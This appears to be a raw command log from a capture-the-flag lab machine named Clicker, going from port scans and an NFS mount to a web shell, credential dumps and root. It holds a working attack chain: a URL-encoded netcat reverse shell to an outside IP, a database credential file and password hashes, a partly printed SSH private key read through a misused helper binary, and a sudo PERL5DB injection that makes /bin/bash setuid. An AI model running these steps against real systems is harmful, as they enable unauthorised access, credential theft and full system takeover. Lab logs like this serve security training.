nmap Clicker.htb
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-24 16:41 EDT
Nmap scan report for Clicker.htb (10.10.11.232)
Host is up (0.034s latency).
rDNS record for 10.10.11.232: clicker.htb
Not shown: 996 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
2049/tcp open nfs
Nmap done: 1 IP address (1 host up) scanned in 0.56 seconds
rustscan -a Clicker.htb --ulimit 5000 -- -sV -sC
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
😵 https://admin.tryhackme.com
[~] The config file is expected to be at "/home/kali/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.10.11.232:22
Open 10.10.11.232:80
Open 10.10.11.232:111
Open 10.10.11.232:2049
Open 10.10.11.232:36955
Open 10.10.11.232:39001
Open 10.10.11.232:43777
Open 10.10.11.232:52497
Open 10.10.11.232:56045
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")
[~] Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-24 16:40 EDT
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 16:40
Completed NSE at 16:40, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 16:40
Completed NSE at 16:40, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 16:40
Completed NSE at 16:40, 0.00s elapsed
Initiating Ping Scan at 16:40
Scanning 10.10.11.232 [2 ports]
Completed Ping Scan at 16:40, 0.03s elapsed (1 total hosts)
Initiating Connect Scan at 16:40
Scanning clicker.htb (10.10.11.232) [9 ports]
Discovered open port 2049/tcp on 10.10.11.232
Discovered open port 80/tcp on 10.10.11.232
Discovered open port 111/tcp on 10.10.11.232
Discovered open port 36955/tcp on 10.10.11.232
Discovered open port 52497/tcp on 10.10.11.232
Discovered open port 56045/tcp on 10.10.11.232
Discovered open port 43777/tcp on 10.10.11.232
Discovered open port 22/tcp on 10.10.11.232
Discovered open port 39001/tcp on 10.10.11.232
Completed Connect Scan at 16:40, 0.03s elapsed (9 total ports)
Initiating Service scan at 16:40
Scanning 9 services on clicker.htb (10.10.11.232)
Completed Service scan at 16:40, 6.33s elapsed (9 services on 1 host)
NSE: Script scanning 10.10.11.232.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 16:40
Completed NSE at 16:40, 1.24s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 16:40
Completed NSE at 16:40, 0.17s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 16:40
Completed NSE at 16:40, 0.00s elapsed
Nmap scan report for clicker.htb (10.10.11.232)
Host is up, received syn-ack (0.032s latency).
Scanned at 2023-10-24 16:40:42 EDT for 8s
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 89:d7:39:34:58:a0:ea:a1:db:c1:3d:14:ec:5d:5a:92 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBO8nDXVOrF/vxCNHYMVULY8wShEwVH5Hy3Bs9s9o/WCwsV52AV5K8pMvcQ9E7JzxrXkUOgIV4I+8hI0iNLGXTVY=
| 256 b4:da:8d:af:65:9c:bb:f0:71:d5:13:50:ed:d8:11:30 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIAjDCjag/Rh72Z4zXCLADSXbGjSPTH8LtkbgATATvbzv
80/tcp open http syn-ack Apache httpd 2.4.52 ((Ubuntu))
|_http-server-header: Apache/2.4.52 (Ubuntu)
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-title: Clicker - The Game
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
111/tcp open rpcbind syn-ack 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 3,4 2049/tcp nfs
| 100003 3,4 2049/tcp6 nfs
| 100005 1,2,3 45875/udp mountd
| 100005 1,2,3 49803/tcp6 mountd
| 100005 1,2,3 50284/udp6 mountd
| 100005 1,2,3 56045/tcp mountd
| 100021 1,3,4 33723/tcp6 nlockmgr
| 100021 1,3,4 36955/tcp nlockmgr
| 100021 1,3,4 43287/udp nlockmgr
| 100021 1,3,4 58410/udp6 nlockmgr
| 100024 1 41710/udp6 status
| 100024 1 43896/udp status
| 100024 1 49553/tcp6 status
| 100024 1 52497/tcp status
| 100227 3 2049/tcp nfs_acl
|_ 100227 3 2049/tcp6 nfs_acl
2049/tcp open nfs_acl syn-ack 3 (RPC #100227)
36955/tcp open nlockmgr syn-ack 1-4 (RPC #100021)
39001/tcp open mountd syn-ack 1-3 (RPC #100005)
43777/tcp open mountd syn-ack 1-3 (RPC #100005)
52497/tcp open status syn-ack 1 (RPC #100024)
56045/tcp open mountd syn-ack 1-3 (RPC #100005)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 16:40
Completed NSE at 16:40, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 16:40
Completed NSE at 16:40, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 16:40
Completed NSE at 16:40, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.91 secondssudo nmap -sSUC -p111 clicker.htb
[sudo] password for kali:
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-24 16:43 EDT
Nmap scan report for clicker.htb (10.10.11.232)
Host is up (0.032s latency).
PORT STATE SERVICE
111/tcp open rpcbind
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 3,4 2049/tcp nfs
| 100003 3,4 2049/tcp6 nfs
| 100005 1,2,3 45875/udp mountd
| 100005 1,2,3 49803/tcp6 mountd
| 100005 1,2,3 50284/udp6 mountd
| 100005 1,2,3 56045/tcp mountd
| 100021 1,3,4 33723/tcp6 nlockmgr
| 100021 1,3,4 36955/tcp nlockmgr
| 100021 1,3,4 43287/udp nlockmgr
| 100021 1,3,4 58410/udp6 nlockmgr
| 100024 1 41710/udp6 status
| 100024 1 43896/udp status
| 100024 1 49553/tcp6 status
| 100024 1 52497/tcp status
| 100227 3 2049/tcp nfs_acl
|_ 100227 3 2049/tcp6 nfs_acl
111/udp open rpcbind
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 3,4 2049/tcp nfs
| 100003 3,4 2049/tcp6 nfs
| 100005 1,2,3 45875/udp mountd
| 100005 1,2,3 49803/tcp6 mountd
| 100005 1,2,3 50284/udp6 mountd
| 100005 1,2,3 56045/tcp mountd
| 100021 1,3,4 33723/tcp6 nlockmgr
| 100021 1,3,4 36955/tcp nlockmgr
| 100021 1,3,4 43287/udp nlockmgr
| 100021 1,3,4 58410/udp6 nlockmgr
| 100024 1 41710/udp6 status
| 100024 1 43896/udp status
| 100024 1 49553/tcp6 status
| 100024 1 52497/tcp status
| 100227 3 2049/tcp nfs_acl
|_ 100227 3 2049/tcp6 nfs_acl
Nmap done: 1 IP address (1 host up) scanned in 14.51 secondsmsf6 auxiliary(scanner/nfs/nfsmount) > exploit
[+] 10.10.11.232:111 - 10.10.11.232 Mountable NFS Export: /mnt/backups [*]
[*] 10.10.11.232:111 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
showmount -e clicker.htb
Export list for clicker.htb:
/mnt/backups *
sudo mount -t nfs clicker.htb:/mnt/backups /tmp -o nolock
http://clicker.htb/exports/top_players_spj3zjw7.php?cmd=busybox%20nc%2010.10.14.11%204444%20-e%20%2Fbin%2Fbash
(remote) www-data@clicker:/var/www/clicker.htb$ cat db_utils.php
<?php
session_start();
$db_server="localhost";
$db_username="clicker_db_user";
$db_password="clicker_db_password";
$db_name="clicker";
$mysqli = new mysqli($db_server, $db_username, $db_password, $db_name);
<STEP>
(remote) www-data@clicker:/var/www/clicker.htb$ mysql -u clicker_db_user -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 368
Server version: 8.0.34-0ubuntu0.22.04.1 (Ubuntu)
Copyright (c) 2000, 2023, Oracle and/or its affiliates.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql>
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| clicker |
| information_schema |
| performance_schema |
+--------------------+
3 rows in set (0.01 sec)
mysql> use clicker
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> show tables;
+-------------------+
| Tables_in_clicker |
+-------------------+
| players |
+-------------------+
1 row in set (0.01 sec)
mysql>
mysql> select * from players
-> ;
+---------------+---------------+------------------------------------------------------------------+-------+--------------------+-----------+
| username | nickname | password | role | clicks | level |
+---------------+---------------+------------------------------------------------------------------+-------+--------------------+-----------+
| admin | admin | ec9407f758dbed2ac510cac18f67056de100b1890f5bd8027ee496cc250e3f82 | Admin | 999999999999999999 | 999999999 |
| ButtonLover99 | ButtonLover99 | 55d1d58e17361fe78a61a96847b0e0226a0bc1a4e38a7b167c10b5cf513ca81f | User | 10000000 | 100 |
| Paol | Paol | bff439c136463a07dac48e50b31a322a4538d1fac26bfb5fd3c48f57a17dabd3 | User | 2776354 | 75 |
| Th3Br0 | Th3Br0 | 3185684ff9fd84f65a6c3037c3214ff4ebdd0e205b6acea97136d23407940c01 | User | 87947322 | 1 |
+---------------+---------------+------------------------------------------------------------------+-------+--------------------+-----------+
4 rows in set (0.00 sec)(remote) www-data@clicker:/opt$ cd m
manage/ monitor.sh
(remote) www-data@clicker:/opt$ cd manage/
(remote) www-data@clicker:/opt/manage$ ls
README.txt execute_query
(remote) www-data@clicker:/opt/manage$ cat README.txt
Web application Management
Use the binary to execute the following task:
- 1: Creates the database structure and adds user admin
- 2: Creates fake players (better not tell anyone)
- 3: Resets the admin password
- 4: Deletes all users except the admin
(remote) www-data@clicker:/opt/manage$ ./execute_query 5 ../.ssh/id_rsa
mysql: [Warning] Using a password on the command line interface can be insecure.
--------------
-----BEGIN OPENSSH PRIVATE KEY---
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
NhAAAAAwEAAQAAAYEAs4eQaWHe45iGSieDHbraAYgQdMwlMGPt50KmMUAvWgAV2zlP8/1Y
J/tSzgoR9Fko8I1UpLnHCLz2Ezsb/MrLCe8nG5TlbJrrQ4HcqnS4TKN7DZ7XW0bup3ayy1
kAAZ9Uot6ep/ekM8E+7/39VZ5fe1FwZj4iRKI+g/BVQFclsgK02B594GkOz33P/Zzte2jV
Tgmy3+htPE5My31i2lXh6XWfepiBOjG+mQDg2OySAphbO1SbMisowP1aSexKMh7Ir6IlPu
nuw3l/luyvRGDN8fyumTeIXVAdPfOqMqTOVECo7hAoY+uYWKfiHxOX4fo+/fNwdcfctBUm
pr5Nxx0GCH1wLnHsbx+/oBkPzxuzd+BcGNZp7FP8cn+dEFz2ty8Ls0Mr+XW5ofivEwr3+e
30OgtpL6QhO2eLiZVrIXOHiPzW49emv4xhuoPF3E/5CA6akeQbbGAppTi+EBG9Lhr04c9E
2uCSLPiZqHiViArcUbbXxWMX2NPSJzDsQ4xeYqFtAAAFiO2Fee3thXntAAAAB3NzaC1yc2
EAAAGBALOHkGlh3uOYhkongx262gGIEHTMJTBj7edCpjFAL1oAFds5T/P9WCf7Us4KEfRZ
KPCNVKS5xwi89hM7G/zKywnvJxuU5Wya60OB3Kp0uEyjew2e11tG7qd2sstZAAGfVKLenq
f3pDPBPu/9/VWeX3tRcGY+IkSiPoPwVUBXJbICtNgefeBpDs99z/2c7Xto1U4Jst/obTxO
TMt9YtpV4el1n3qYgToxvpkA4NjskgKYWztUmzIrKMD9WknsSjIeyK+iJT7p7sN5f5bsr0
RgzfH8rpk3iF1QHT3zqjKkzlRAqO4QKGPrmFin4h8Tl+H6Pv3zcHXH3LQVJqa+TccdBgh9
cC5x7G8fv6AZD88bs3fgXBjWaexT/HJ/nRBc9rcvC7NDK/l1uaH4rxMK9/nt9DoLaS+kIT
tni4mVayFzh4j81uPXpr+MYbqDxdxP+QgOmpHkG2xgKaU4vhARvS4a9OHPRNrgkiz4mah4
lYgK3FG218VjF9jT0icw7EOMXmKhbQAAAAMBAAEAAAGACLYPP83L7uc7vOVl609hvKlJgy
FUvKBcrtgBEGq44XkXlmeVhZVJbcc4IV9Dt8OLxQBWlxecnMPufMhld0Kvz2+XSjNTXo21
1LS8bFj1iGJ2WhbXBErQ0bdkvZE3+twsUyrSL/xIL2q1DxgX7sucfnNZLNze9M2akvRabq
ssh -i id_rsa jack@clicker.htb
Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-84-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Tue Oct 24 04:14:42 PM UTC 2023
System load: 0.0
Usage of /: 53.6% of 5.77GB
Memory usage: 20%
Swap usage: 0%
Processes: 241
Users logged in: 0
IPv4 address for eth0: 10.10.11.232
IPv6 address for eth0: dead:beef::250:56ff:feb9:6bf5
Expanded Security Maintenance for Applications is not enabled.
0 updates can be applied immediately.
Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
jack@clicker:~$
#!/usr/bin/perl -w
# $Id: /xmltwig/trunk/tools/xml_pp/xml_pp 32 2008-01-18T13:11:52.128782Z mrodrigu $
use strict;
use XML::Twig;
use File::Temp qw/tempfile/;
use File::Basename qw/dirname/;
my @styles= XML::Twig->_pretty_print_styles; # from XML::Twig
my $styles= join '|', @styles; # for usage
my %styles= map { $_ => 1} @styles; # to check option
my $DEFAULT_STYLE= 'indented';
my $USAGE= "usage: $0 [-v] [-i<extension>] [-s ($styles)] [-p <tag(s)>] [-e <encoding>] [-l] [-f <file>] [<files>]";
# because of the -i.bak option I don't think I can use one of the core
# option processing modules, so it's custom handling and no clusterization :--(
<STEP>sudo PERL5OPT=-d PERL5DB='exec "chmod u+s /bin/bash"' /opt/monitor.sh
Statement unlikely to be reached at /usr/bin/xml_pp line 9.
(Maybe you meant system() when you said exec()?)